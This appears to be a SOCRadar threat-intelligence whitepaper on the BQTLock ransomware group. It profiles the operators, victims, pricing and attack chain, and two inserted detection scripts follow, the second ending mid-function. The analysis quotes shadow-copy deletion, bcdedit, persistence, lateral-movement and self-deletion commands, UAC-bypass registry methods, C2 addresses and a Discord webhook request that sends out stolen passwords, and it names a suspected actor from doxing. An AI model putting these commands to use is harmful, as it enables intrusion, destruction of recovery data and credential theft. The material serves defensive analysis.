BQTLock Ransomware Whitepaper
Country of Origin: Lebanon (?)

BQTLock is a new Ransomware-as-a-Service (RaaS) that has quickly disrupted the scene. Starting in the East and now operating globally, it shows unique behavior, including data theft in every version. BQTLock targets victims in waves, demands Monero (XMR), and has possible links to hacktivist groups.

SOCRadar (socradar.io): Your Eyes Beyond

BQTLock Ransomware

BQTLock is an advanced ransomware-as-a-service (RaaS) that emerged in recent months and is entering the scene in a disruptive way. Its operations, attack methods, and malware features stand out from other ransomware groups. Originating in the East and expanding to global operations, BQTLock combines rapid technical growth with aggressive extortion models. Each malware version includes not only encryption but also data theft, showing continuous sophistication. Victims face both operational disruption and the threat of sensitive data leaks.

Figure: Threat actor card of BQTLock Ransomware

The group uses a wave-based business model and demands payment mainly in Monero (XMR). It also mixes economic goals with propaganda, making it both a financial and an ideological threat. This hybrid style is rare in the ransomware landscape and makes BQTLock a case of special interest for researchers and defenders.

Who is BQTLock Ransomware?

This threat group developed the ransomware that gives the operation its name. Its main representative is Karim Fayad (known online as ZeroDayX or ZeroDayX1), supported by Fuch0u, who frequently appears on the adversary's public pages. The group appears to maintain close relationships with pro-Palestinian hacktivist groups such as Liwaa Mohammed, with mutual activity on social networks.
SOCRadar Cyber Threat Intelligence, Ransomware Intelligence

Publicly, BQTLock emphasizes political messaging and ideological motives; however, the primary internal driver is financial gain, in contrast with true hacktivist operations. This dual model, part hacktivist and part criminal, introduces a novel twist on traditional RaaS models and raises questions about the misuse of political narratives to instill fear while pursuing financial objectives.

Figure: X (Twitter) profiles of Anonymous Lebanon and LulzSec

The core team appears to include ZeroDayX and Fuch0u, who have historically been linked to accounts such as Anonymous Lebanon and have interacted with LulzSec-related accounts and Anonymous-affiliated activities.

Figure: SOCRadar's Threat Hunting, message in the liwaamohammad Telegram channel: "Hello i am ZeroDayX the real owner of Liwaa mohammad and BQTLock ransomware"

In addition, both BQTLock and ZeroDayX himself have interacted directly with the pro-Palestinian hacktivist group Liwaa Mohammed; ZeroDayX proclaims himself the leader of that organization and has consistently posted BQTLock update messages through Telegram channels managed by the hacktivist group.

Figure: Telegram post by ZeroDayX linking Liwaa Mohammad and BQTLock Ransomware, with attack claims and RaaS promotion

ZeroDayX was doxed by the R00TK1T ISC Cyber Team, which directly linked him to LulzSec. His real name was revealed as Karim Fayad, and the exposed personal information connected the current leader of BQTLock directly to these hacktivist groups.

Figure: SOCRadar's Threat Hunting, doxing of ZeroDayX by R00TK1T on their Telegram channel

The proximity between BQTLock and these hacktivist groups, and the likelihood that the same user is behind them, is evident across all the social networks mentioned, forming a solid core of organization and communication.
Figure: Photos of the suspected admin of BQTLock, shared on Telegram

Analysis shows BQTLock's leadership (Karim Fayad aka ZeroDayX and Fuch0u), ties to Liwaa Mohammed, possible past links to LulzSec and Anonymous Lebanon, and victim listings with ransom demands totaling over 700 XMR (~190k USD).

Figure: Link analysis of the BQTLock Ransomware

The BQTLock team has consistently communicated via Telegram channels, which have been used for propaganda, update announcements, and liaison with RaaS affiliates. Victims are also left a note with an email address for more direct and professional communication.

Victimology

Since BQTLock burst onto the scene, it has appeared in various orchestrated campaigns or attacks that have severely impacted victims. The threat actor has shown adaptability and evolution both in its techniques and in the malware used. These campaigns have been amplified through the Telegram groups at its disposal, which serve as the main thread of its messaging. Some of the attacks have been claimed in these groups by the operators and creators of the ransomware, in order to put additional pressure on the victims by making them public.

Confirmed Victims

● USA Military Alumni Networks – full computer and database backups compromised, with an unpaid demand of 500 XMR.

Figure: Victim posting on their data leak site (DLS)

● eFunda, Inc. – over 270 subdomains affected, with full backups encrypted and an unpaid demand of 600 XMR.

Figure: Victim posting on their DLS #2

● European Business Server Cluster – servers in Europe targeted, with 1500 XMR requested.
Figure: Victim posting on their DLS & Telegram #3

The adversary boasts on its various social media platforms about attacks on the domains of the targets mentioned, which belong to sectors such as education or public/military matters. This fits the usual modus operandi of RaaS operations that predate BQTLock and follows the narrative described above: targets are generally in the US, with elements the adversary can use for its pro-Palestine narrative.

Figure: Organizations allegedly compromised by BQTLock, shared on Telegram

In addition to the companies already confirmed on its website, the adversary has continued targeting web pages and, consequently, businesses, where the ransom demand remains unknown. Defaced websites are as follows:

mindmoney[.]fun
skilltoart[.]com
kasmirPort[.]com

The impact has been made visible by defacing their portals to showcase the attack, something that has been echoed both in Telegram groups and on Twitter accounts managed or controlled by ZeroDayX.

Figure: One of the websites defaced by BQTLock

Target Industries

Beyond the confirmed victims, certain trends are expected or have already been observed, both for BQTLock and for potential affiliates using the RaaS in their operational model. BQTLock is a completely new ransomware group with pro-Palestinian propaganda styles, and its own history together with that of earlier RaaS operations (whose trajectories are often parallel, with similar beginnings) supports these expectations, taking the particularities of the actor into account.

Potential BQTLock victims may belong to different archetypes:

● Healthcare: generally has low or very low defensive capabilities and high operational criticality, directly putting human lives at risk, and could add propaganda impact in strategic countries.
● Educational: following some cases already seen, and considering the extensive relationships with potential companies and the intellectual property that resides there, these are entities with limited cybersecurity capabilities.
● SMEs or SMBs: typically with low cybersecurity spending and serving as suppliers to larger companies of greater economic weight, forcing them to pay if they don't want the breach to become public, and potentially yielding information about other companies for future attacks.
● Public sector: public entities such as municipalities or similar organizations are often testing grounds for criminal groups because of their weak cybersecurity defenses and limited technical capabilities, and have dual use in terms of hacktivist pressure against countries that oppose the group's ideals.
● Critical infrastructure: although of greater technical complexity, this sector often has public or political ties that could become a focus for exploitation by BQTLock, given the great importance and criticality that these companies have in areas such as utilities, energy, or logistics.
● Financial sector: banks and fintech, combining real economic damage with symbolic damage against "Western capitalism".

Target Countries

Confirmed attacks have affected organizations in the United States, Europe, and other regions. Propaganda messaging also shows hostility toward Israel, the UAE, the European Union, and the United States, aligning with the group's hacktivist narrative. The hacktivist tendencies that BQTLock follows may be decisive in selecting future victims, both for the original core that created the RaaS and for potential affiliates who share the same beliefs. This makes it strategically important to understand which countries could be targeted, considering BQTLock's anti-Western vision and narrative.
Existing and potential target countries:

● United States and Israel: main targets aligned with the group's hacktivist rhetoric, which frames these attacks as "resistance" against Western and Middle Eastern policies.
● European countries: especially those with pro-Israel policies or a strong presence of multinational corporations, using the narrative of "economic liberation".
● Western-aligned nations: including Australia, Canada, and others perceived as part of the Western "establishment", or Middle Eastern and other countries with ties to them, such as Saudi Arabia, India, or the UAE.

Figure: A poll for "Which country should be targeted" on their Telegram channel(s)

This hybrid strategy allows BQTLock to justify attacks as "acts of resistance" while sustaining a profitable business model, creating a dangerous precedent where economic motivations are concealed under seemingly legitimate political causes.

Modus Operandi

Once again, BQTLock operates under a Ransomware-as-a-Service (RaaS) model. The core group develops and maintains the ransomware, while affiliates conduct the actual intrusions and spread the malware. In return, affiliates share ransom payments with the operators.

Decryption Waves & Estimated Gains

A distinguishing element of BQTLock is undoubtedly its use of decryption waves, where different tiers have been established for the release of affected files. The group releases free keys under names like 1337 or LULZ, and depending on the decryption method, each operation applies a different wave, showing great depth and a system distinct from what we were accustomed to in other RaaS operations.

Figure: Tiers of decryption waves

At first glance, BQTLock shows clear hacktivist influences, using terms like 1337, LULZ, or 313 to label waves.
These serve as pricing tiers, from cheapest to most expensive:

● 1337 (leet): a symbol of hacker elitism, but in practice the "basic" model, starting at 13 XMR.
● LULZ: linked to fun or notoriety, their "intermediate" version, starting at 26 XMR.
● 313: oriented toward political/geopolitical targets, the "premium" model, starting at 40 XMR.

Although styled with hacktivist jargon, the purpose is economic. Like LockBit, ALPHV, or Conti, they use tiered pricing to adapt ransom demands to each victim. So far, BQTLock has claimed at least three companies, with estimated demands above 700 XMR. Earnings could exceed 1,000 XMR (~$300,000 USD), while some Twitter posts by ZeroDayX suggest ransoms above $2 million USD, pointing to a wider range. All of this within less than 3 months of activity. If sustained, BQTLock could double its earnings quickly, following the path of bigger groups.

Pricing & Affiliates

BQTLock not only targets companies directly but also runs a full affiliate system. Through XMR payments, external actors can buy access in starter, professional, or enterprise tiers. Affiliates get full use of the tool, with options to customize ransom notes, wallpapers, decryptors, and other features. The program also includes support, communication, and platform access.

● Starter (9 XMR, 2 weeks)
● Professional (15 XMR, 1 month)
● Enterprise (30 XMR, 3 months)

The system also implements psychological pressure tactics on victims: ransom fees double after 48 hours and decryption keys are destroyed after 7 days without response.
Figure: Pricing system for the RaaS program

https://socradar.io/lockbit-5-0-ransomware-cartel-what-you-need-to-know/

Technical Details

In the technical section, BQTLock has demonstrated capability and development in each of its attacks, where it has been able to deploy the ransomware that gives it its name, creating expectation among analysts and fear in companies that could potentially be affected.

Binary Information

Once the attacker has gained access, they can carry out their activities by trying to obtain information from the compromised device, also discovering adjacent disks or networks in order to move tools or the ransomware itself to other devices and detonate it. The adversary has recently worked with a ZIP file containing various libraries that support some of the functionality of the main executable, plus other executables that assist in certain tasks, such as the partial decryptor: on occasion the adversary has offered decryptor samples so that the user and/or affiliate can see the potential and verify that they have the necessary tools.

Figure: Contents of the mentioned ZIP file

DLLs

The libraries are usually legitimate files: they pose no risk by themselves and are not developed by the adversary, but they support certain very important tasks for ransomware development.
Some of the most important ones include:

● Encryption/cryptography functions: OpenSSL for AES-256/RSA-4096 (OpenSSL 3.x)
● Communications: HTTP/HTTPS, QUIC, SSH, and FTP protocols, commonly used for Discord and Telegram
● Multi-algorithm compression: different methods (Brotli, Zstandard, and Zlib)
● Technical support: multi-threading, compilation, and asynchronous communications
● Evasion and/or operational resilience: domain validation and potential use of different protocols

Bundling a large number of libraries is typically done to make the malware resilient and self-sufficient: BQTLock's capabilities are quite complex and the developers want to be able to execute the ransomware on any device, so they do not want to depend on libraries that might not be present on the affected system. This commonly occurs when a simplified example of the decryptor is provided to potential buyers and/or affiliates to show how it works, or because the project is in a testing phase. This kind of file deployment is not common in advanced ransomware, but it is another indication that BQTLock is both in development and seeking new affiliates.

Decryptor

Among the executables we find the decryptor example, whose function is to locate the different drives, traverse folders searching for encrypted files, and pass them through the decrypt function to try to recover them. However, this is only an example; the complete version has obviously not been shared, as the group reserves it for its own use or for affiliates who purchase the Professional or Enterprise versions, as seen previously.
Figure: BQTLock decryptor in action, console output scanning directories and reporting errors

The adversary is actively working on the tool and publicly shows on social media clear examples where a new version of this decryptor executes successfully in a different environment, passing the extension of the files to search for and the key to perform the operation.

Figure: Alleged decryptor in action (shared by the threat actor itself on X)

https://x.com/zerodayx1/status/1950908574072217732

Figure: The threat actor showcasing the decryptor on social media platforms (left to right: SOCRadar Threat Hunting, Telegram and X)

Ransomware & Versions

The main binary, which contains the ransomware, has undergone changes and improvements over the months. Despite BQTLock's short lifespan, the developers have shown great work and agility in updating and improving the malware, adding new functionality or perfecting the techniques used, and presenting them as different versions of BQTLock.

● Before July – V1: auto-deletes backups, fast encryption, pre-exfiltration, visual customization, persistence (process hollowing, scheduled tasks, etc.).
● July – V2 & V3: undocumented, but likely included code refinement, RaaS builder improvements, evasion upgrades, and added customization.
● July & August – V4: introduced advanced anti-analysis, system recognition, Discord C2, privilege escalation (SeDebug, hollowing), and UAC bypass.
● August & September – V4+: added browser credential theft (Chrome, Firefox, Edge, Opera, Brave), expanded exfiltration, a new Linux version with builder, and an OSINT tool (BAQIYAT.osint).
Figure: Version timeline of BQTLock ransomware strains

After analyzing various samples, BQTLock presents itself as ransomware with a large number of interesting characteristics, which we review below in order to understand how they work, with the objective of breaking down all relevant functionality and gaining an orderly understanding of the developers' work. Note that in the latest versions the binary usually uses multi-threading, allowing it to perform operations simultaneously.

Attack Chain

The malware's behavior may vary depending on the version, but the execution chain tends to remain consistent in terms of the tasks it performs. Depending on the builder, additional capabilities may be included.

Figure: Visualization of BQTLock's attack chain

Initial Access

The attack method for a RaaS typically varies in each incursion, as each victim presents different weaknesses at the technological level (exposed RDP, vulnerabilities...) or at the human level (phishing, insiders...). The initial access obtained by BQTLock in its incursions is still unknown; however, based on the history of other RaaS operations, we can speculate about the most common access methods for this type of adversary:

● Service exploitation: compromised or weak credentials on exposed services (usually RDP), which RaaS users can obtain through brute force, password spraying, etc., or which are likely facilitated by Initial Access Brokers.
● Phishing campaigns: email-based delivery of the malicious ZIP archive containing the initial BQTLock binary, named Update.exe.
● Software vulnerabilities: exploitation of unpatched systems to deliver the payload; since the adversary has affected various domains, they could have exploited vulnerabilities in these systems to gain access.
● Supply chain attacks: given the targeting of educational and military networks, information obtained from one organization allows the group to pivot to other companies.

Execution

BQTLock still contains sections related to the development of the ransomware itself: in all samples it regularly logs most of the steps it follows. For this purpose, it writes a txt file to a temporary path (\Windows\Temp\bqt_log.txt) that is accessible to any user, thereby avoiding locations such as System32 or Program Files.

Figure: Decompiled and disassembled code showing BQTLock creating and writing logs to C:\Windows\Temp\bqt_log.txt

Figure: Txt file and its content

Once the log is in place, it performs other reconnaissance and verification tasks, such as obtaining information about the operating system where the ransomware is running. After extracting the information, it logs it, a practice it repeats throughout most other sections.

Figure: Code showing BQTLock retrieving the OS version, with the log file confirming detection of Windows 6.1 Build

In the initial phases, it is common for the malware to check a mutex to know whether the binary is already running. It uses a GUID-style name (Global\{00A0B0C0-D0E0-F00-1000-200030}) to blend in, which makes detection more complicated; the name can change depending on the builder version, so it is not static as in other malware.

Figure: Disassembled code in IDA Pro showing BQTLock creating a mutex with a GUID format to avoid multiple executions and hinder detection

A fundamental aspect of the malware is checking for analysis techniques or malware analysis platforms; in these phases it is common to verify whether the executable is running in a virtual machine or whether any debugger is running.
This phase can be performed in various ways, but in most samples the malware performs different checks using IsDebuggerPresent, or checks whether a remote debugger is present (CheckRemoteDebuggerPresent), checks that analysts are also used to bypassing.

Figure: Decompiled view showing BQTLock using IsDebuggerPresent to detect debugging environments

Figure: Anti-debug checks with IsDebuggerPresent and CheckRemoteDebuggerPresent, logging "Performing anti-debug checks"

In this section, we can also see different checks trying to locate where the victim is situated, making external requests and collecting the public IP of the network it is on. For this, it can use different platforms that return this information, which it saves during execution.

Figure: BQTLock retrieving and logging the victim's public IP address during execution

Figure: BQTLock using the legitimate service icanhazip[.]com to obtain the victim's public IP address

Reconnaissance

After finishing the initial phase, where it collects key information, the malware moves to a more technical section where it obtains more relevant data. It begins by extracting device information such as the computer name, which it uses later.

Figure: BQTLock retrieving the computer name and username from the infected system

In some versions, it also obtains information about the BIOS or motherboard using WMI and, depending on the version, uses the same mechanism to query Win32_ComputerSystem and Win32_OperatingSystem. In this case, it queries Win32_BIOS and Win32_BaseBoard to get the BIOS and motherboard serial numbers respectively. Like the previous information, it uses these later to generate unique identifiers, a very common practice in ransomware, and sends them externally so the operators know the characteristics of each affected device.
Figure: BQTLock querying BIOS and BaseBoard serial numbers via WMI to fingerprint the victim system

In this phase, it also performs reconnaissance of what is connected to the device, where it can find disks or shared folders. This information is also key to knowing what needs to be traversed and, therefore, encrypted later. In the analyzed samples, it has been common to collect the size of each disk traversed and how much free space remains.

Figure: BQTLock checking available disk space and collecting drive information from the victim system

Figure: API call trace revealing BQTLock interacting with drives (C:\ and D:) using CreateFile, QueryFullSizeInformation, and CloseFile

Privilege Escalation

In a more advanced section, the ransomware performs less common practices such as user creation, something operators or RaaS affiliates usually do before executing samples in order to have greater control over the infrastructure and/or be able to execute tools or malware with elevated privileges. In addition, the ransomware obviously checks who is executing the sample to know whether they have sufficient permissions. In newer versions, the adversaries have introduced UAC bypass functionality, which allows the sample to execute legitimate binaries that elevate implicitly when launched (auto-elevated). This means they can execute LOLBins that run as administrator/SYSTEM without the usual prompt asking whether to run the binary as administrator, effectively bypassing UAC.
The bypass chosen depends on the operating system; depending on the case it can perform one of the following:

● Windows 11: copies the malware payload to the temporary path (bqt_btpass.inf) and executes cmstp.exe /au \\bqt_btpass.inf

Figure: if Windows 11

● Windows 10: modifies the registry key HKCU\Software\Classes\ms-settings\Shell\Open\command, inserting the payload in it, and executes fodhelper.exe, which reads the registry key and executes the binary

Figure: else if Windows 10

● Windows 7/8: modifies the registry key HKCU\Software\Classes\mscfile\shell\open\command, inserting the payload in it, and executes eventvwr.exe, which reads the registry key and executes the binary

Figure: else if Windows 7/8

In the analyzed case, the sample already had adequate privileges, so this step was not necessary:

Figure: The malware is already running with administrator privileges

After this function, the malware checks its tokens to adjust privileges if necessary, both as a verification and to increase them, ensuring the next step. For this it performs the usual combination of:

OpenProcessToken + TOKEN_ADJUST_PRIVILEGES (0x28) + LookupPrivilegeValueA + SeDebugPrivilege

With the bypass and this step, it achieves much higher privileges, which serve it in the following phases, such as the creation of an administrator user. The user is created with different naming patterns: sometimes BQTLockAdmin, sometimes Guest_"ID", where the ID is generated at runtime and therefore differs in each sample. As we can see, the generated passwords are simple and contain just enough to meet minimum password complexity requirements (8+ characters, at least one special character, and a mix of lowercase and uppercase letters with some digits).
Figure: Creation of an administrator user

Figure: BQTLock successfully creating a new admin user account (Guest_3437) with elevated privileges

Command and Control (C2)

At this point, the malware holds sensitive device information, has managed to execute the sample as administrator by bypassing UAC, and has escalated privileges. Next, it tries to establish contact with the C&C and obtain more relevant information from the affected device. First, it tries to connect to the C2, which it usually reaches through one of two IPs (92[.]113[.]146[.]56 and 208[.]99[.]44[.]55) depending on the sample.

Figure: C2 IP #1
Figure: C2 IP #2
Figure: Login screen on C2 IP

Here it performs the bootstrap phase: with the collected device information it makes a request to the attacker-controlled host carrying the necessary fields. The adversary receives elements such as:

● OS version of the affected device
● Hostname
● User
● HW serials (BIOS, motherboard)
● Public IP
● Administrator user and password created previously
● API key (BQTLOCK_...)

Figure: BQTLock preparing an api_key parameter used for authenticating infected devices with its C2 server #1
Figure: BQTLock preparing an api_key parameter used for authenticating infected devices with its C2 server #2

Everything is passed through RSA encryption; the attacker responds with confirmation of the device registration and a BOT-ID, which lets the operator know which machine and campaign each device belongs to, making affiliate management much easier. This identifier is also used in the README file, so that the victim can communicate with the attacker in an orderly manner based on this kind of indicator.
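The execution, privilege-escalation and C2 stages above leave host-level traces that a defender can correlate: the bqt_* files dropped in C:\Windows\Temp, the registry write to a hijack key followed by the launch of the matching auto-elevating binary, the BQTLockAdmin / Guest_<id> account creation, and connections to the two C2 addresses. The following triage script is an added example written for this page, not SOCRadar's code or anything from the BQTLock toolkit; the flat event schema (dicts with a "type" field, in the spirit of Sysmon events, ordered by time) and the sample timeline are constructed assumptions, while the indicator values themselves come from the whitepaper.

```python
import re
from pathlib import PureWindowsPath

# Indicators quoted from the whitepaper: UAC-bypass registry keys and the
# auto-elevating binary launched after each, the two C2 IPs, and the naming
# patterns of the administrator account the sample creates.
UAC_BYPASS_KEYS = {
    r"hkcu\software\classes\ms-settings\shell\open\command": "fodhelper.exe",
    r"hkcu\software\classes\mscfile\shell\open\command": "eventvwr.exe",
}
C2_IPS = {"92.113.146.56", "208.99.44.55"}
ROGUE_USER = re.compile(r"^(BQTLockAdmin|Guest_\d+)$")
TEMP_DIR = PureWindowsPath(r"C:\Windows\Temp")

# Event schema is an assumption for this example: a time-ordered list of dicts
# with a "type" field ("file_create", "registry_set", "process_create",
# "user_create", "net_connect"), loosely modelled on Sysmon events.


def detect_uac_bypass(events):
    """Registry-hijack chains (write to a hijack key, then the matching
    auto-elevating binary launched) and the cmstp.exe /au launch of a dropped
    .inf file. A lone registry write does not fire: the follow-up launch is
    required, so an administrative tool touching the key alone stays quiet."""
    findings, pending = [], set()
    for ev in events:
        if ev["type"] == "registry_set" and ev["key"].lower() in UAC_BYPASS_KEYS:
            pending.add(ev["key"].lower())
        elif ev["type"] == "process_create":
            image = PureWindowsPath(ev["image"]).name.lower()
            cmd = ev.get("cmdline", "").lower()
            for key in pending:
                if image == UAC_BYPASS_KEYS[key]:
                    findings.append(("uac_bypass_registry", f"{image} after write to {key}"))
            if image == "cmstp.exe" and "/au" in cmd and ".inf" in cmd:
                findings.append(("uac_bypass_cmstp", ev["cmdline"]))
    return findings


def detect_rogue_admin(events):
    """Local account creation matching the BQTLockAdmin / Guest_<id> patterns."""
    return [("rogue_admin_user", ev["name"]) for ev in events
            if ev["type"] == "user_create" and ROGUE_USER.match(ev["name"])]


def detect_c2(events):
    """Outbound connections to the C2 addresses named in the report."""
    return [("c2_connection", ev["dest_ip"]) for ev in events
            if ev["type"] == "net_connect" and ev["dest_ip"] in C2_IPS]


def detect_temp_artifacts(events):
    """bqt_* files (log, passwords, screenshot, wallpaper, .inf) in C:\\Windows\\Temp."""
    out = []
    for ev in events:
        if ev["type"] == "file_create":
            p = PureWindowsPath(ev["path"])
            if p.parent == TEMP_DIR and p.name.lower().startswith("bqt_"):
                out.append(("temp_artifact", p.name))
    return out


def triage(events):
    """Run every detector over one host's timeline; return (tag, detail) findings."""
    findings = []
    for detector in (detect_uac_bypass, detect_rogue_admin, detect_c2, detect_temp_artifacts):
        findings.extend(detector(events))
    return findings


# Constructed sample timeline (not real telemetry), following the sequence the
# report describes: log file, registry hijack, fodhelper launch, admin user,
# C2 check-in, credential file.
SAMPLE_EVENTS = [
    {"type": "file_create", "path": r"C:\Windows\Temp\bqt_log.txt"},
    {"type": "registry_set", "key": r"HKCU\Software\Classes\ms-settings\Shell\Open\command",
     "value": r"C:\Users\victim\Downloads\Update.exe"},
    {"type": "process_create", "image": r"C:\Windows\System32\fodhelper.exe", "cmdline": "fodhelper.exe"},
    {"type": "user_create", "name": "Guest_3437", "group": "Administrators"},
    {"type": "net_connect", "dest_ip": "92.113.146.56", "dest_port": 80},
    {"type": "file_create", "path": r"C:\Windows\Temp\bqt_passwords.txt"},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for tag, detail in triage(SAMPLE_EVENTS):
        print(f"{tag:22} {detail}")
```

The ordering requirement in detect_uac_bypass is the design point: the registry write and the LOLBin launch are each individually noisy, but the write followed by the launch on the same host is the bypass described above. The mutex name is deliberately not used as an indicator, since the report notes it changes with the builder version.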
Figure: C2 response confirming successful registration of the infected device with bot ID #1
Figure: C2 response confirming successful registration of the infected device with bot ID #2

In addition to registering with the BQTLock panel, the malware can also use Telegram to send the same information to a bot whose details are extracted during execution. It builds the request with the same fields observed previously. Although this might seem redundant, it allows operators and affiliates to manage infections or receive alerts directly on mobile devices, providing greater accessibility through these bots. It also serves as a safeguard in case the panel is taken down, while offering an alternative channel for controlling data exfiltration, as shown later.

Figure: BQTLock sample using the Telegram API to send stolen data via bot commands

After this checkpoint, the malware continues obtaining device information: it takes screenshots of the affected device's screen, capturing everything on the victim's monitor, and saves the captures, usually in the same temporary path used previously.

Figure: BQTLock capturing a screenshot of the victim's desktop and saving it as bqt_screenshot in the Windows Temp directory
Figure: BQTLock writing the captured screenshot file into the Windows Temp directory
Figure: The saved screenshot (bqt_screenshot_41611140.png)

During this phase, the developers have introduced browser data theft capabilities, an uncommon feature in this type of malware. Here we can observe how it has an internal list of browsers, which it traverses searching for them on the affected device, locating each browser's profiles and extracting credentials by accessing paths such as User Data or Login Data.
Figure: BQTLock retrieving browser paths (Chrome, Google, User Data, Default, Edge) to access stored credentials and profile information
Figure: BQTLock targeting multiple web browsers to steal stored credentials and profiles
Figure: BQTLock accessing user profile and browser data directories under AppData and Roaming
Figure: File system activity showing BQTLock creating and reading files across multiple web browsers' user data folders

The browsers generally searched by BQTLock, in all cases by accessing their User Data and Profiles paths, are the following:

● Chrome
● Edge
● Brave
● Opera
● Vivaldi
● Yandex
● Firefox

Once it has extracted all information from these browsers, it saves the credentials in a new file, created previously in the same temporary path, to be sent subsequently.

Figure: BQTLock storing stolen credentials in bqt_passwords.txt within the Windows Temp directory
Figure: BQTLock storing stolen credentials in bqt_passwords.txt within the Windows Temp directory #2
Figure: Passwords text file in Windows files

In addition to communicating with the C&C, BQTLock also communicates with Discord, where it sends these extracted files. In this function, it constructs the HTTP request using multipart/form-data, attaching the password file so the operators can access it easily via Discord; the traffic is encrypted without any additional action on the malware's part.
POST https://discord.com/api/webhooks//
Content-Type: multipart/form-data; boundary=---------------------------2327476541
Content-Length:

-----------------------------2327476541
Content-Disposition: form-data; name="payload_json"
Content-Type: application/json

{ "content": "File attached: bqt_passwords.txt" }
-----------------------------2327476541
Content-Disposition: form-data; name="passwords_file"; filename="bqt_passwords.txt"
Content-Type: text/plain

--- Collected Browser Passwords ---
-----------------------------2327476541--
BQTLock using HttpOpenRequestA to send stolen data via Discord webhooks
Using Discord means the operators need no infrastructure of their own, affiliates and operators can reach the results easily, and a webhook can simply be swapped for a new one if it is blocked: a simple cloud setup well suited to this kind of activity.
Impact
After the previous reconnaissance, the adversary has gathered critical intelligence about both the target device and the data stored in its browsers. BQTLock is now ready for its final phase, which performs the most impactful operations: file encryption, lateral movement attempts, and persistence.
First, the samples prepare a wallpaper that will later be set as the desktop background. The malware decodes static data embedded in the binary at runtime into a BMP image, saves it in the same temporary directory used by the earlier operations, and applies it with the SystemParametersInfoA API.
SPI_SETDESKWALLPAPER flag
Decode + write folder & path + SystemParametersInfoA + SPI_SETDESKWALLPAPER (0x14)
Wallpaper path
C:\Windows\Temp\bqt_wallpaper.bmp
During this phase, shadow copy deletion is standard practice, alongside modifications via bcdedit.
This functionality has evolved across versions, using different execution methods to achieve the following objectives:
● Shadow Copy Elimination: abuse of vssadmin to delete shadow copies, preventing Windows recovery
● WMIC Shadow Copy Deletion: using wmic for the same purpose while redirecting output to avoid leaving traces
● Boot Recovery Disabling: deactivating Windows automatic startup repair via bcdedit
● WinRE Disabling: disabling the Windows Recovery Environment through bcdedit abuse
vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete > NUL 2>&1
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures > NUL 2>&1
bcdedit.exe /set {default} recoveryenabled no > NUL 2>&1
Deletion of shadow copies
After these system modifications, the malware inspects running processes and terminates any that could halt encryption or alert users to BQTLock's presence (for example, by causing database application failures). It uses the standard approach: take a snapshot of running processes, compare each against an internal blacklist, and terminate the matches.
CreateToolhelp32Snapshot + Process32First + (OpenProcess + TerminateProcess) + Process32Next
During analysis, when one of the monitored analysis tools is detected (procmon.exe in the example below), the check can be patched to bypass it and keep the tool running.
BQTLock detecting procmon.exe
This step precedes process hollowing. Executing inside another process's memory space, which looks more legitimate than the original binary, is key to evading defenses and staying stealthy. At this point, using the previously escalated privileges to access critical processes, the malware launches explorer.exe in a suspended state, reserves memory in it, and writes its code there before the process resumes.
CreateProcess (explorer.exe in suspended mode) + GetThreadContext + VirtualAlloc + WriteProcessMemory + SetThreadContext + ResumeThread
Process injection flow
During injection, the binary to be injected was extracted for verification, comparing the original with the in-memory version to identify potential new functions. It is identical to the executing binary: injection into explorer.exe completes, and a legitimate process now contains BQTLock's code.
Process hollowing successful
A system restart is a critical point: if the system were powered down during this phase, the adversary would lose partial progress. Persistence is therefore essential to ensure the binary is re-executed. BQTLock creates scheduled tasks under various names that run at each logon (ONLOGON), re-launching the payload whenever necessary.
Usual command line:
schtasks /create /tn "" /tr "" /sc ONLOGON /rl HIGHEST /f
Task names used:
Microsoft\Windows\Maintenance\SystemHealthCheck
BQTLock_Startup_
BQTLock creating a scheduled task
Properties of the scheduled task
Next, the malware attempts to spread across the network, a capability not found in all ransomware families. BQTLock can propagate its samples to adjacent networks and devices. In this phase it attempts to copy and execute the file via WMIC, and it also has the potential to create remote services via sc.exe, though that functionality is not commonly observed in general execution.
wmic /node:\\ process call create ""
Process call creation
Payload copy and process creation
Once file movement and injection are complete, depending on the version, the malware may delete the original binary. Since it commonly creates copies in temporary directories, this improves evasion.
With persistence already established, the scheduled path is invoked on each iteration, so the original binary can be removed. This self-deletion commonly runs through cmd.exe, or through batch files in older versions.
cmd.exe /C timeout /t 3 /nobreak > NUL & del /f /q "" & exit
BQTLock executing a self-deletion routine to remove its binary after execution
In the most critical phase, when encryption begins, multi-threading becomes most apparent as the sample systematically traverses each disk to locate target files.
Code snippet showing BQTLock scanning and identifying available logical drives for encryption
During this operation the sample calls the functions that prepare the ransom note, typically stored as Base64-encoded strings decoded at runtime. The note's filename varies because the builder allows both the filename and the extension appended to encrypted files to be changed; the extension is also prepared in this phase.
Disk traversing
README_pay_DECRYPT.txt
README_pay2_DECRYPT.txt
README_DECRYPT.txt
Txt file creation
Decoded ransom note
Encryption uses a hybrid AES-256 + RSA-4096 scheme, iterating over the selected files in separate threads. Each file is encrypted with AES, and each per-file AES key is encrypted with an RSA public key (via OpenSSL) so that only the private key held by the affiliates or operators who launched the attack can recover it. Depending on the sample, files may first be renamed to .temp, then encrypted and renamed to ".bqtlock".
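The following is an added example, not code from the whitepaper or from BQTLock, showing how the Impact-phase command lines quoted above (shadow copy deletion via vssadmin and wmic, the bcdedit recovery changes, the ONLOGON scheduled task, remote process creation via WMIC, and the timeout-then-del self-deletion) can be matched against process-creation telemetry in the shape of Sysmon Event ID 1 records (ProcessId, Image, CommandLine). The sample events are constructed: the hostname FILESRV01, the PIDs, the task path and the payload path are made up.

```python
"""Match process-creation telemetry against the Impact-phase command lines BQTLock runs."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    tool: str          # executable expected as Image, or named inside a cmd.exe /c wrapper
    patterns: tuple    # every regex must match CommandLine (case-insensitive)


RULES = (
    Rule("Shadow copy deletion via vssadmin", "T1490", "vssadmin.exe",
         (r"delete\s+shadows", r"/all")),
    Rule("Shadow copy deletion via WMIC", "T1490", "wmic.exe",
         (r"shadowcopy\s+delete",)),
    Rule("Boot recovery disabled via bcdedit", "T1490", "bcdedit.exe",
         (r"bootstatuspolicy\s+ignoreallfailures|recoveryenabled\s+no",)),
    Rule("Logon-triggered task with highest run level", "T1053.005", "schtasks.exe",
         (r"/create", r"/sc\s+onlogon", r"/rl\s+highest")),
    Rule("Remote process creation via WMIC", "T1047", "wmic.exe",
         (r"/node:", r"process\s+call\s+create")),
    Rule("Delayed self-deletion via cmd", "T1070.004", "cmd.exe",
         (r"timeout\s+/t\s+\d+", r"/nobreak", r"del\s+/f\s+/q")),
)


def _uses_tool(event, tool):
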